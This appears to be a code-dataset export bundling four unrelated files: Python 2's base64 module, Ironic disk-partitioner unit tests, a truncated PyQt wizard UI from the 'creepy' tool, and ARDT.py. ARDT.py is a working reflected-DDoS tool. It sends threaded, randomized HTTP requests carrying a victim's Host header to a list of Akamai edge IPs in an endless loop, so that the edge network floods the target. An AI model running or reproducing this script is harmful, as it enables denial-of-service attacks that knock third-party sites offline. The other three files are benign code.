repo_name
stringlengths 5
100
| path
stringlengths 4
299
| copies
stringclasses 990
values | size
stringlengths 4
7
| content
stringlengths 666
1.03M
| license
stringclasses 15
values | hash
int64 -9,223,351,895,964,839,000
9,223,297,778B
| line_mean
float64 3.17
100
| line_max
int64 7
1k
| alpha_frac
float64 0.25
0.98
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
kontais/EFI-MIPS | ToolKit/cmds/python/Lib/base64.py | 7 | 11261 | #! /usr/bin/env python
"""RFC 3548: Base16, Base32, Base64 Data Encodings"""
# Modified 04-Oct-1995 by Jack Jansen to use binascii module
# Modified 30-Dec-2003 by Barry Warsaw to add full RFC 3548 support
import re
import struct
import binascii
__all__ = [
# Legacy interface exports traditional RFC 1521 Base64 encodings
'encode', 'decode', 'encodestring', 'decodestring',
# Generalized interface for other encodings
'b64encode', 'b64decode', 'b32encode', 'b32decode',
'b16encode', 'b16decode',
# Standard Base64 encoding
'standard_b64encode', 'standard_b64decode',
# Some common Base64 alternatives. As referenced by RFC 3458, see thread
# starting at:
#
# http://zgp.org/pipermail/p2p-hackers/2001-September/000316.html
'urlsafe_b64encode', 'urlsafe_b64decode',
]
_translation = [chr(_x) for _x in range(256)]
EMPTYSTRING = ''
def _translate(s, altchars):
translation = _translation[:]
for k, v in altchars.items():
translation[ord(k)] = v
return s.translate(''.join(translation))
# Base64 encoding/decoding uses binascii
def b64encode(s, altchars=None):
"""Encode a string using Base64.
s is the string to encode. Optional altchars must be a string of at least
length 2 (additional characters are ignored) which specifies an
alternative alphabet for the '+' and '/' characters. This allows an
application to e.g. generate url or filesystem safe Base64 strings.
The encoded string is returned.
"""
# Strip off the trailing newline
encoded = binascii.b2a_base64(s)[:-1]
if altchars is not None:
return _translate(encoded, {'+': altchars[0], '/': altchars[1]})
return encoded
def b64decode(s, altchars=None):
"""Decode a Base64 encoded string.
s is the string to decode. Optional altchars must be a string of at least
length 2 (additional characters are ignored) which specifies the
alternative alphabet used instead of the '+' and '/' characters.
The decoded string is returned. A TypeError is raised if s were
incorrectly padded or if there are non-alphabet characters present in the
string.
"""
if altchars is not None:
s = _translate(s, {altchars[0]: '+', altchars[1]: '/'})
try:
return binascii.a2b_base64(s)
except binascii.Error, msg:
# Transform this exception for consistency
raise TypeError(msg)
def standard_b64encode(s):
"""Encode a string using the standard Base64 alphabet.
s is the string to encode. The encoded string is returned.
"""
return b64encode(s)
def standard_b64decode(s):
"""Decode a string encoded with the standard Base64 alphabet.
s is the string to decode. The decoded string is returned. A TypeError
is raised if the string is incorrectly padded or if there are non-alphabet
characters present in the string.
"""
return b64decode(s)
def urlsafe_b64encode(s):
"""Encode a string using a url-safe Base64 alphabet.
s is the string to encode. The encoded string is returned. The alphabet
uses '-' instead of '+' and '_' instead of '/'.
"""
return b64encode(s, '-_')
def urlsafe_b64decode(s):
"""Decode a string encoded with the standard Base64 alphabet.
s is the string to decode. The decoded string is returned. A TypeError
is raised if the string is incorrectly padded or if there are non-alphabet
characters present in the string.
The alphabet uses '-' instead of '+' and '_' instead of '/'.
"""
return b64decode(s, '-_')
# Base32 encoding/decoding must be done in Python
_b32alphabet = {
0: 'A', 9: 'J', 18: 'S', 27: '3',
1: 'B', 10: 'K', 19: 'T', 28: '4',
2: 'C', 11: 'L', 20: 'U', 29: '5',
3: 'D', 12: 'M', 21: 'V', 30: '6',
4: 'E', 13: 'N', 22: 'W', 31: '7',
5: 'F', 14: 'O', 23: 'X',
6: 'G', 15: 'P', 24: 'Y',
7: 'H', 16: 'Q', 25: 'Z',
8: 'I', 17: 'R', 26: '2',
}
_b32tab = [v for v in _b32alphabet.values()]
_b32rev = dict([(v, long(k)) for k, v in _b32alphabet.items()])
def b32encode(s):
"""Encode a string using Base32.
s is the string to encode. The encoded string is returned.
"""
parts = []
quanta, leftover = divmod(len(s), 5)
# Pad the last quantum with zero bits if necessary
if leftover:
s += ('\0' * (5 - leftover))
quanta += 1
for i in range(quanta):
# c1 and c2 are 16 bits wide, c3 is 8 bits wide. The intent of this
# code is to process the 40 bits in units of 5 bits. So we take the 1
# leftover bit of c1 and tack it onto c2. Then we take the 2 leftover
# bits of c2 and tack them onto c3. The shifts and masks are intended
# to give us values of exactly 5 bits in width.
c1, c2, c3 = struct.unpack('!HHB', s[i*5:(i+1)*5])
c2 += (c1 & 1) << 16 # 17 bits wide
c3 += (c2 & 3) << 8 # 10 bits wide
parts.extend([_b32tab[c1 >> 11], # bits 1 - 5
_b32tab[(c1 >> 6) & 0x1f], # bits 6 - 10
_b32tab[(c1 >> 1) & 0x1f], # bits 11 - 15
_b32tab[c2 >> 12], # bits 16 - 20 (1 - 5)
_b32tab[(c2 >> 7) & 0x1f], # bits 21 - 25 (6 - 10)
_b32tab[(c2 >> 2) & 0x1f], # bits 26 - 30 (11 - 15)
_b32tab[c3 >> 5], # bits 31 - 35 (1 - 5)
_b32tab[c3 & 0x1f], # bits 36 - 40 (1 - 5)
])
encoded = EMPTYSTRING.join(parts)
# Adjust for any leftover partial quanta
if leftover == 1:
return encoded[:-6] + '======'
elif leftover == 2:
return encoded[:-4] + '===='
elif leftover == 3:
return encoded[:-3] + '==='
elif leftover == 4:
return encoded[:-1] + '='
return encoded
def b32decode(s, casefold=False, map01=None):
"""Decode a Base32 encoded string.
s is the string to decode. Optional casefold is a flag specifying whether
a lowercase alphabet is acceptable as input. For security purposes, the
default is False.
RFC 3548 allows for optional mapping of the digit 0 (zero) to the letter O
(oh), and for optional mapping of the digit 1 (one) to either the letter I
(eye) or letter L (el). The optional argument map01 when not None,
specifies which letter the digit 1 should be mapped to (when map01 is not
None, the digit 0 is always mapped to the letter O). For security
purposes the default is None, so that 0 and 1 are not allowed in the
input.
The decoded string is returned. A TypeError is raised if s were
incorrectly padded or if there are non-alphabet characters present in the
string.
"""
quanta, leftover = divmod(len(s), 8)
if leftover:
raise TypeError('Incorrect padding')
# Handle section 2.4 zero and one mapping. The flag map01 will be either
# False, or the character to map the digit 1 (one) to. It should be
# either L (el) or I (eye).
if map01:
s = _translate(s, {'0': 'O', '1': map01})
if casefold:
s = s.upper()
# Strip off pad characters from the right. We need to count the pad
# characters because this will tell us how many null bytes to remove from
# the end of the decoded string.
padchars = 0
mo = re.search('(?P<pad>[=]*)$', s)
if mo:
padchars = len(mo.group('pad'))
if padchars > 0:
s = s[:-padchars]
# Now decode the full quanta
parts = []
acc = 0
shift = 35
for c in s:
val = _b32rev.get(c)
if val is None:
raise TypeError('Non-base32 digit found')
acc += _b32rev[c] << shift
shift -= 5
if shift < 0:
parts.append(binascii.unhexlify('%010x' % acc))
acc = 0
shift = 35
# Process the last, partial quanta
last = binascii.unhexlify('%010x' % acc)
if padchars == 0:
last = '' # No characters
elif padchars == 1:
last = last[:-1]
elif padchars == 3:
last = last[:-2]
elif padchars == 4:
last = last[:-3]
elif padchars == 6:
last = last[:-4]
else:
raise TypeError('Incorrect padding')
parts.append(last)
return EMPTYSTRING.join(parts)
# RFC 3548, Base 16 Alphabet specifies uppercase, but hexlify() returns
# lowercase. The RFC also recommends against accepting input case
# insensitively.
def b16encode(s):
"""Encode a string using Base16.
s is the string to encode. The encoded string is returned.
"""
return binascii.hexlify(s).upper()
def b16decode(s, casefold=False):
"""Decode a Base16 encoded string.
s is the string to decode. Optional casefold is a flag specifying whether
a lowercase alphabet is acceptable as input. For security purposes, the
default is False.
The decoded string is returned. A TypeError is raised if s were
incorrectly padded or if there are non-alphabet characters present in the
string.
"""
if casefold:
s = s.upper()
if re.search('[^0-9A-F]', s):
raise TypeError('Non-base16 digit found')
return binascii.unhexlify(s)
# Legacy interface. This code could be cleaned up since I don't believe
# binascii has any line length limitations. It just doesn't seem worth it
# though.
MAXLINESIZE = 76 # Excluding the CRLF
MAXBINSIZE = (MAXLINESIZE//4)*3
def encode(input, output):
"""Encode a file."""
while True:
s = input.read(MAXBINSIZE)
if not s:
break
while len(s) < MAXBINSIZE:
ns = input.read(MAXBINSIZE-len(s))
if not ns:
break
s += ns
line = binascii.b2a_base64(s)
output.write(line)
def decode(input, output):
"""Decode a file."""
while True:
line = input.readline()
if not line:
break
s = binascii.a2b_base64(line)
output.write(s)
def encodestring(s):
"""Encode a string."""
pieces = []
for i in range(0, len(s), MAXBINSIZE):
chunk = s[i : i + MAXBINSIZE]
pieces.append(binascii.b2a_base64(chunk))
return "".join(pieces)
def decodestring(s):
"""Decode a string."""
return binascii.a2b_base64(s)
# Useable as a script...
def test():
"""Small test program"""
import sys, getopt
try:
opts, args = getopt.getopt(sys.argv[1:], 'deut')
except getopt.error, msg:
sys.stdout = sys.stderr
print msg
print """usage: %s [-d|-e|-u|-t] [file|-]
-d, -u: decode
-e: encode (default)
-t: encode and decode string 'Aladdin:open sesame'"""%sys.argv[0]
sys.exit(2)
func = encode
for o, a in opts:
if o == '-e': func = encode
if o == '-d': func = decode
if o == '-u': func = decode
if o == '-t': test1(); return
if args and args[0] != '-':
func(open(args[0], 'rb'), sys.stdout)
else:
func(sys.stdin, sys.stdout)
def test1():
s0 = "Aladdin:open sesame"
s1 = encodestring(s0)
s2 = decodestring(s1)
print s0, repr(s1), s2
if __name__ == '__main__':
test()
| bsd-3-clause | 6,864,509,106,308,675,000 | 30.107735 | 78 | 0.595684 | false |
redhat-openstack/ironic | ironic/tests/common/test_disk_partitioner.py | 3 | 8877 | # Copyright 2014 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import eventlet
import mock
from testtools.matchers import HasLength
from ironic.common import disk_partitioner
from ironic.common import exception
from ironic.common import utils
from ironic.tests import base
@mock.patch.object(eventlet.greenthread, 'sleep', lambda seconds: None)
class DiskPartitionerTestCase(base.TestCase):
def test_add_partition(self):
dp = disk_partitioner.DiskPartitioner('/dev/fake')
dp.add_partition(1024)
dp.add_partition(512, fs_type='linux-swap')
dp.add_partition(2048, bootable=True)
expected = [(1, {'bootable': False,
'fs_type': '',
'type': 'primary',
'size': 1024}),
(2, {'bootable': False,
'fs_type': 'linux-swap',
'type': 'primary',
'size': 512}),
(3, {'bootable': True,
'fs_type': '',
'type': 'primary',
'size': 2048})]
partitions = [(n, p) for n, p in dp.get_partitions()]
self.assertThat(partitions, HasLength(3))
self.assertEqual(expected, partitions)
@mock.patch.object(disk_partitioner.DiskPartitioner, '_exec',
autospec=True)
@mock.patch.object(utils, 'execute', autospec=True)
def test_commit(self, mock_utils_exc, mock_disk_partitioner_exec):
dp = disk_partitioner.DiskPartitioner('/dev/fake')
fake_parts = [(1, {'bootable': False,
'fs_type': 'fake-fs-type',
'type': 'fake-type',
'size': 1}),
(2, {'bootable': True,
'fs_type': 'fake-fs-type',
'type': 'fake-type',
'size': 1})]
with mock.patch.object(dp, 'get_partitions', autospec=True) as mock_gp:
mock_gp.return_value = fake_parts
mock_utils_exc.return_value = (None, None)
dp.commit()
mock_disk_partitioner_exec.assert_called_once_with(
mock.ANY, 'mklabel', 'msdos',
'mkpart', 'fake-type', 'fake-fs-type', '1', '2',
'mkpart', 'fake-type', 'fake-fs-type', '2', '3',
'set', '2', 'boot', 'on')
mock_utils_exc.assert_called_once_with(
'fuser', '/dev/fake', run_as_root=True, check_exit_code=[0, 1])
@mock.patch.object(disk_partitioner.DiskPartitioner, '_exec',
autospec=True)
@mock.patch.object(utils, 'execute', autospec=True)
def test_commit_with_device_is_busy_once(self, mock_utils_exc,
mock_disk_partitioner_exec):
dp = disk_partitioner.DiskPartitioner('/dev/fake')
fake_parts = [(1, {'bootable': False,
'fs_type': 'fake-fs-type',
'type': 'fake-type',
'size': 1}),
(2, {'bootable': True,
'fs_type': 'fake-fs-type',
'type': 'fake-type',
'size': 1})]
fuser_outputs = iter([("/dev/fake: 10000 10001", None), (None, None)])
with mock.patch.object(dp, 'get_partitions', autospec=True) as mock_gp:
mock_gp.return_value = fake_parts
mock_utils_exc.side_effect = fuser_outputs
dp.commit()
mock_disk_partitioner_exec.assert_called_once_with(
mock.ANY, 'mklabel', 'msdos',
'mkpart', 'fake-type', 'fake-fs-type', '1', '2',
'mkpart', 'fake-type', 'fake-fs-type', '2', '3',
'set', '2', 'boot', 'on')
mock_utils_exc.assert_called_with(
'fuser', '/dev/fake', run_as_root=True, check_exit_code=[0, 1])
self.assertEqual(2, mock_utils_exc.call_count)
@mock.patch.object(disk_partitioner.DiskPartitioner, '_exec',
autospec=True)
@mock.patch.object(utils, 'execute', autospec=True)
def test_commit_with_device_is_always_busy(self, mock_utils_exc,
mock_disk_partitioner_exec):
dp = disk_partitioner.DiskPartitioner('/dev/fake')
fake_parts = [(1, {'bootable': False,
'fs_type': 'fake-fs-type',
'type': 'fake-type',
'size': 1}),
(2, {'bootable': True,
'fs_type': 'fake-fs-type',
'type': 'fake-type',
'size': 1})]
with mock.patch.object(dp, 'get_partitions', autospec=True) as mock_gp:
mock_gp.return_value = fake_parts
mock_utils_exc.return_value = ("/dev/fake: 10000 10001", None)
self.assertRaises(exception.InstanceDeployFailure, dp.commit)
mock_disk_partitioner_exec.assert_called_once_with(
mock.ANY, 'mklabel', 'msdos',
'mkpart', 'fake-type', 'fake-fs-type', '1', '2',
'mkpart', 'fake-type', 'fake-fs-type', '2', '3',
'set', '2', 'boot', 'on')
mock_utils_exc.assert_called_with(
'fuser', '/dev/fake', run_as_root=True, check_exit_code=[0, 1])
self.assertEqual(20, mock_utils_exc.call_count)
@mock.patch.object(disk_partitioner.DiskPartitioner, '_exec',
autospec=True)
@mock.patch.object(utils, 'execute', autospec=True)
def test_commit_with_device_disconnected(self, mock_utils_exc,
mock_disk_partitioner_exec):
dp = disk_partitioner.DiskPartitioner('/dev/fake')
fake_parts = [(1, {'bootable': False,
'fs_type': 'fake-fs-type',
'type': 'fake-type',
'size': 1}),
(2, {'bootable': True,
'fs_type': 'fake-fs-type',
'type': 'fake-type',
'size': 1})]
with mock.patch.object(dp, 'get_partitions', autospec=True) as mock_gp:
mock_gp.return_value = fake_parts
mock_utils_exc.return_value = (None, "Specified filename /dev/fake"
" does not exist.")
self.assertRaises(exception.InstanceDeployFailure, dp.commit)
mock_disk_partitioner_exec.assert_called_once_with(
mock.ANY, 'mklabel', 'msdos',
'mkpart', 'fake-type', 'fake-fs-type', '1', '2',
'mkpart', 'fake-type', 'fake-fs-type', '2', '3',
'set', '2', 'boot', 'on')
mock_utils_exc.assert_called_with(
'fuser', '/dev/fake', run_as_root=True, check_exit_code=[0, 1])
self.assertEqual(20, mock_utils_exc.call_count)
@mock.patch.object(utils, 'execute', autospec=True)
class ListPartitionsTestCase(base.TestCase):
def test_correct(self, execute_mock):
output = """
BYT;
/dev/sda:500107862016B:scsi:512:4096:msdos:ATA HGST HTS725050A7:;
1:1.00MiB:501MiB:500MiB:ext4::boot;
2:501MiB:476940MiB:476439MiB:::;
"""
expected = [
{'number': 1, 'start': 1, 'end': 501, 'size': 500,
'filesystem': 'ext4', 'flags': 'boot'},
{'number': 2, 'start': 501, 'end': 476940, 'size': 476439,
'filesystem': '', 'flags': ''},
]
execute_mock.return_value = (output, '')
result = disk_partitioner.list_partitions('/dev/fake')
self.assertEqual(expected, result)
execute_mock.assert_called_once_with(
'parted', '-s', '-m', '/dev/fake', 'unit', 'MiB', 'print',
use_standard_locale=True, run_as_root=True)
@mock.patch.object(disk_partitioner.LOG, 'warn', autospec=True)
def test_incorrect(self, log_mock, execute_mock):
output = """
BYT;
/dev/sda:500107862016B:scsi:512:4096:msdos:ATA HGST HTS725050A7:;
1:XX1076MiB:---:524MiB:ext4::boot;
"""
execute_mock.return_value = (output, '')
self.assertEqual([], disk_partitioner.list_partitions('/dev/fake'))
self.assertEqual(1, log_mock.call_count)
| apache-2.0 | 5,499,461,690,389,595,000 | 43.833333 | 79 | 0.528332 | false |
tdr130/ARDT | ARDT.py | 9 | 4935 | #!/usr/bin/env python
#
######################################
import threading
import re
import sys
import time
import socket
import string
import random
import hashlib
import Queue
c_g = "\033[1;32m"
c_r = "\033[1;31m"
c_y = "\033[1;33m"
c_e = "\033[0m"
target = ""
akamai_ips = []
base_request = ""
threads = []
num_threads = 40
VERSION = "v1.0"
def banner():
print c_g
print "IOKWiOKWiOKWiOKWiOKWiOKVlyDilojilojilojilojilojilojilZcg4paI4paI4paI4paI4paI4paI4pWXIOKWiOKWiOKWiOKWiOKWiOKWiOKWiOKWiOKVlwrilojilojilZTilZDilZDilojilojilZfilojilojilZTilZDilZDilojilojilZfilojilojilZTilZDilZDilojilojilZfilZrilZDilZDilojilojilZTilZDilZDilZ0K4paI4paI4paI4paI4paI4paI4paI4pWR4paI4paI4paI4paI4paI4paI4pWU4pWd4paI4paI4pWRICDilojilojilZEgICDilojilojilZEgICAK4paI4paI4pWU4pWQ4pWQ4paI4paI4pWR4paI4paI4pWU4pWQ4pWQ4paI4paI4pWX4paI4paI4pWRICDilojilojilZEgICDilojilojilZEgICAK4paI4paI4pWRICDilojilojilZHilojilojilZEgIOKWiOKWiOKVkeKWiOKWiOKWiOKWiOKWiOKWiOKVlOKVnSAgIOKWiOKWiOKVkSAgIArilZrilZDilZ0gIOKVmuKVkOKVneKVmuKVkOKVnSAg4pWa4pWQ4pWd4pWa4pWQ4pWQ4pWQ4pWQ4pWQ4pWdICAgIOKVmuKVkOKVnSAgICVzCg==".decode("base64") % VERSION
print c_e
print " Akamai Reflected DDoS Tool\n"
print "\tby @program_ninja"
print " https://github.com/m57/ARDT.git"
print "_" * 37 + "\n"
def usage():
banner()
print "Usage: %s -l [akamai_list] -t [victim_host] -r [request_file] -n [threads (default: 40)] " % sys.argv[0]
print ""
exit()
def gen_rand_string():
charset = string.ascii_letters
rand_string = ""
for i in range(1, 15):
rand_string += str(random.randint(1,999999))
rand_string += charset[random.randint(0,len(charset)-1)]
return hashlib.md5(rand_string).hexdigest()
class WorkerThread(threading.Thread):
def __init__(self, qin, tid):
threading.Thread.__init__(self)
self.qin = qin
self.tid = tid
self.kill_received = False
def stop(self):
self.kill_recieved = True
def run(self):
while not self.kill_received:
while True:
try:
akami_ip = self.qin.get(timeout=1)
except Queue.Empty:
print c_y + "[?] " + c_e + "Queue empty, please wait..."
try:
r = base_request.replace("%RANDOM%", gen_rand_string())
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
s.connect( (akami_ip, 80) )
s.send(r)
ret = s.recv(16).strip()
print c_g + "[Thread '%d' ] Packet => '%s:80' => Response '%s'" % (self.tid, akami_ip, ret) + c_e
s.close()
self.qin.task_done()
except:
print c_r + "[!] " + c_e + "Error contacting '%s:80'" % akami_ip
s.close()
if __name__ == "__main__":
if "-t" not in sys.argv:
t_check = False
else:
t_check = True
if "-l" not in sys.argv or "-r" not in sys.argv:
usage()
if "-n" in sys.argv:
num_threads = int(sys.argv[sys.argv.index("-n")+1])
banner()
akamai_list = sys.argv[sys.argv.index("-l")+1]
request_f = sys.argv[sys.argv.index("-r")+1]
try:
request_file = open(request_f, "r")
base_request = request_file.read()
if "Host: " not in base_request and not t_check:
print c_r + "[!] " + c_e + "'Host: ' field not found in HTTP(s) request file '%s', either set this manually or use '-t www.target.com' in the command line options" % request_f
exit()
elif "Host: " in base_request and not t_check:
reg = "(Host: .*)"
target = re.findall(reg, base_request)[0].split(":")[1].strip()
except:
print c_r + "[!] " + c_e,
print "Error opening request file: '%s'." % request_f
exit()
try:
if t_check:
target = sys.argv[sys.argv.index("-t")+1]
base_request = base_request.strip() + "\r\nHost: %s\r\n\r\n" % target
except:
pass
try:
akami_file = open(akamai_list, "r")
for i in akami_file.readlines():
akamai_ips.append(i.strip())
except:
print c_r + "[!] " + c_e,
print "Error opening Akamai list file: '%s'." % akamai_list
exit()
start_time = time.time()
print c_y + "[?] " + c_e + " Target: '%s'" % target
print c_y + "[?] " + c_e + " Request file: '%s'" % request_f
print c_y + "[?] " + c_e + " Akamai EdgeHosts file ('%s' IP's): '%s'" % ( len(akamai_ips), akamai_list)
print c_y + "[?] " + c_e + " Threads '%d'\n" % num_threads
x = raw_input(c_r + "[!] " + c_e + " This is about to perform a reflected DDoS attack with the above settings.\nAre you sure ? [Y/N] ")
if not (x[:1] == "y") or (x[:1] == "Y"):
print c_r + "[!] " + c_e + " Exiting..."
exit()
while True:
qin = Queue.Queue()
try:
for i in range(0, num_threads):
worker = WorkerThread(qin, i)
worker.setDaemon(True)
worker.daemon = True
worker.start()
threads.append(worker)
for ip in akamai_ips:
qin.put(ip)
qin.join()
print c_g + "[*] " + c_e + "All Akamai hosts done, re-looping!"
time.sleep(1)
except KeyboardInterrupt:
print c_r + "[!] " + c_e + "Ctrl+C Caught! Exiting threads..."
for t in threads:
t.stop()
sys.exit(0)
| gpl-2.0 | -5,622,923,735,651,769,000 | 26.416667 | 732 | 0.636272 | false |
jkakavas/creepy | creepy/ui/PersonProjectWizard.py | 7 | 18769 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '.\personProjectWizard.ui'
#
# Created: Fri Jan 31 15:30:24 2014
# by: PyQt4 UI code generator 4.9.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_personProjectWizard(object):
def setupUi(self, personProjectWizard):
personProjectWizard.setObjectName(_fromUtf8("personProjectWizard"))
personProjectWizard.resize(898, 702)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/creepy/user")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
personProjectWizard.setWindowIcon(icon)
personProjectWizard.setWizardStyle(QtGui.QWizard.ClassicStyle)
personProjectWizard.setOptions(QtGui.QWizard.HelpButtonOnRight)
self.personProjectWizardPage1 = QtGui.QWizardPage()
self.personProjectWizardPage1.setObjectName(_fromUtf8("personProjectWizardPage1"))
self.gridLayoutWidget = QtGui.QWidget(self.personProjectWizardPage1)
self.gridLayoutWidget.setGeometry(QtCore.QRect(0, 0, 861, 591))
self.gridLayoutWidget.setObjectName(_fromUtf8("gridLayoutWidget"))
self.gridLayout_3 = QtGui.QGridLayout(self.gridLayoutWidget)
self.gridLayout_3.setMargin(0)
self.gridLayout_3.setObjectName(_fromUtf8("gridLayout_3"))
self.personProjectDescriptionValue = QtGui.QPlainTextEdit(self.gridLayoutWidget)
self.personProjectDescriptionValue.setPlainText(_fromUtf8(""))
self.personProjectDescriptionValue.setObjectName(_fromUtf8("personProjectDescriptionValue"))
self.gridLayout_3.addWidget(self.personProjectDescriptionValue, 2, 1, 1, 1)
spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout_3.addItem(spacerItem, 3, 1, 1, 1)
self.personProjectNameValue = QtGui.QLineEdit(self.gridLayoutWidget)
self.personProjectNameValue.setObjectName(_fromUtf8("personProjectNameValue"))
self.gridLayout_3.addWidget(self.personProjectNameValue, 0, 1, 1, 1)
self.personProjectNameLabel = QtGui.QLabel(self.gridLayoutWidget)
self.personProjectNameLabel.setEnabled(True)
self.personProjectNameLabel.setObjectName(_fromUtf8("personProjectNameLabel"))
self.gridLayout_3.addWidget(self.personProjectNameLabel, 0, 0, 1, 1)
self.personProjectKeywordsValue = QtGui.QLineEdit(self.gridLayoutWidget)
self.personProjectKeywordsValue.setObjectName(_fromUtf8("personProjectKeywordsValue"))
self.gridLayout_3.addWidget(self.personProjectKeywordsValue, 1, 1, 1, 1)
self.personProjectDescriptionLabel = QtGui.QLabel(self.gridLayoutWidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.personProjectDescriptionLabel.sizePolicy().hasHeightForWidth())
self.personProjectDescriptionLabel.setSizePolicy(sizePolicy)
self.personProjectDescriptionLabel.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
self.personProjectDescriptionLabel.setObjectName(_fromUtf8("personProjectDescriptionLabel"))
self.gridLayout_3.addWidget(self.personProjectDescriptionLabel, 2, 0, 1, 1)
self.personProkectKeywordsLabel = QtGui.QLabel(self.gridLayoutWidget)
self.personProkectKeywordsLabel.setObjectName(_fromUtf8("personProkectKeywordsLabel"))
self.gridLayout_3.addWidget(self.personProkectKeywordsLabel, 1, 0, 1, 1)
personProjectWizard.addPage(self.personProjectWizardPage1)
self.personProjectWizardPage2 = QtGui.QWizardPage()
self.personProjectWizardPage2.setObjectName(_fromUtf8("personProjectWizardPage2"))
self.gridLayout = QtGui.QGridLayout(self.personProjectWizardPage2)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem1)
self.btnAddTarget = QtGui.QPushButton(self.personProjectWizardPage2)
self.btnAddTarget.setFocusPolicy(QtCore.Qt.NoFocus)
self.btnAddTarget.setStyleSheet(_fromUtf8(""))
self.btnAddTarget.setObjectName(_fromUtf8("btnAddTarget"))
self.horizontalLayout.addWidget(self.btnAddTarget)
self.gridLayout.addLayout(self.horizontalLayout, 5, 3, 1, 1)
self.personProjectSelectedTargetsTable = QtGui.QTableView(self.personProjectWizardPage2)
self.personProjectSelectedTargetsTable.setDragEnabled(False)
self.personProjectSelectedTargetsTable.setDragDropOverwriteMode(True)
self.personProjectSelectedTargetsTable.setDragDropMode(QtGui.QAbstractItemView.DropOnly)
self.personProjectSelectedTargetsTable.setDefaultDropAction(QtCore.Qt.CopyAction)
self.personProjectSelectedTargetsTable.setSelectionMode(QtGui.QAbstractItemView.MultiSelection)
self.personProjectSelectedTargetsTable.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
self.personProjectSelectedTargetsTable.setSortingEnabled(True)
self.personProjectSelectedTargetsTable.setObjectName(_fromUtf8("personProjectSelectedTargetsTable"))
self.personProjectSelectedTargetsTable.horizontalHeader().setCascadingSectionResizes(True)
self.personProjectSelectedTargetsTable.horizontalHeader().setStretchLastSection(True)
self.personProjectSelectedTargetsTable.verticalHeader().setVisible(False)
self.personProjectSelectedTargetsTable.verticalHeader().setCascadingSectionResizes(True)
self.gridLayout.addWidget(self.personProjectSelectedTargetsTable, 8, 2, 1, 2)
self.personProjectTargetSeperatorLine = QtGui.QFrame(self.personProjectWizardPage2)
self.personProjectTargetSeperatorLine.setLineWidth(4)
self.personProjectTargetSeperatorLine.setFrameShape(QtGui.QFrame.HLine)
self.personProjectTargetSeperatorLine.setFrameShadow(QtGui.QFrame.Sunken)
self.personProjectTargetSeperatorLine.setObjectName(_fromUtf8("personProjectTargetSeperatorLine"))
self.gridLayout.addWidget(self.personProjectTargetSeperatorLine, 6, 1, 1, 3)
self.personProjectSearchResultsTable = QtGui.QTableView(self.personProjectWizardPage2)
self.personProjectSearchResultsTable.setDragEnabled(True)
self.personProjectSearchResultsTable.setDragDropMode(QtGui.QAbstractItemView.DragDrop)
self.personProjectSearchResultsTable.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
self.personProjectSearchResultsTable.setSortingEnabled(True)
self.personProjectSearchResultsTable.setObjectName(_fromUtf8("personProjectSearchResultsTable"))
self.personProjectSearchResultsTable.horizontalHeader().setCascadingSectionResizes(True)
self.personProjectSearchResultsTable.horizontalHeader().setStretchLastSection(True)
self.personProjectSearchResultsTable.verticalHeader().setVisible(False)
self.personProjectSearchResultsTable.verticalHeader().setCascadingSectionResizes(True)
self.personProjectSearchResultsTable.verticalHeader().setMinimumSectionSize(19)
self.personProjectSearchResultsTable.verticalHeader().setStretchLastSection(False)
self.gridLayout.addWidget(self.personProjectSearchResultsTable, 4, 2, 1, 2)
self.personProjectSearchForLabel = QtGui.QLabel(self.personProjectWizardPage2)
self.personProjectSearchForLabel.setObjectName(_fromUtf8("personProjectSearchForLabel"))
self.gridLayout.addWidget(self.personProjectSearchForLabel, 0, 0, 1, 2)
self.personProjectSearchResultsLabel = QtGui.QLabel(self.personProjectWizardPage2)
self.personProjectSearchResultsLabel.setObjectName(_fromUtf8("personProjectSearchResultsLabel"))
self.gridLayout.addWidget(self.personProjectSearchResultsLabel, 4, 0, 1, 1)
self.personProjectSelectedTargetsLabel = QtGui.QLabel(self.personProjectWizardPage2)
self.personProjectSelectedTargetsLabel.setObjectName(_fromUtf8("personProjectSelectedTargetsLabel"))
self.gridLayout.addWidget(self.personProjectSelectedTargetsLabel, 8, 0, 1, 1)
self.personProjectSearchInLabel = QtGui.QLabel(self.personProjectWizardPage2)
self.personProjectSearchInLabel.setObjectName(_fromUtf8("personProjectSearchInLabel"))
self.gridLayout.addWidget(self.personProjectSearchInLabel, 1, 0, 1, 2)
spacerItem2 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.gridLayout.addItem(spacerItem2, 3, 2, 1, 1)
self.personProjectSearchForDetailsLabel = QtGui.QLabel(self.personProjectWizardPage2)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
